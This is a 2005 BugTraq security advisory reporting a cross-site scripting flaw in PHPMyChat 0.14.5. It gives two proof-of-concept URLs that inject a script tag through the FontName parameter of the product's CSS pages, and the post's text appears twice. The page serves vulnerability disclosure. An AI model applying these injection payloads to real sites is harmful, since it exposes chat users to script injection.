BugTraq
Back to list
|
Post reply
PHPHeaven PHPMyChat Cross-site Scripting Vulnerablitiy
May 14 2005 04:21AM
Megasky (magasky hotmail com)
www.phpheaven.net/
Vulnerable versions: PHPMyChat 0.14.5
Proof of concept:
http://www.example.com/chat/config/start-page.css.php3?Charset=iso-8859-
1&medium=10&FontName=<script>var%20test=1;alert(test);</script&
gt;
http://www.example.com/chat/config/style.css.php3?Charset=iso-8859-1&med
ium=10&FontName=<script>var%20test=1;alert(test);</script>
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
www.phpheaven.net/
Vulnerable versions: PHPMyChat 0.14.5
Proof of concept:
http://www.example.com/chat/config/start-page.css.php3?Charset=iso-8859-
1&medium=10&FontName=<script>var%20test=1;alert(test);</script&
gt;
http://www.example.com/chat/config/style.css.php3?Charset=iso-8859-1&med
ium=10&FontName=<script>var%20test=1;alert(test);</script>
[ reply ]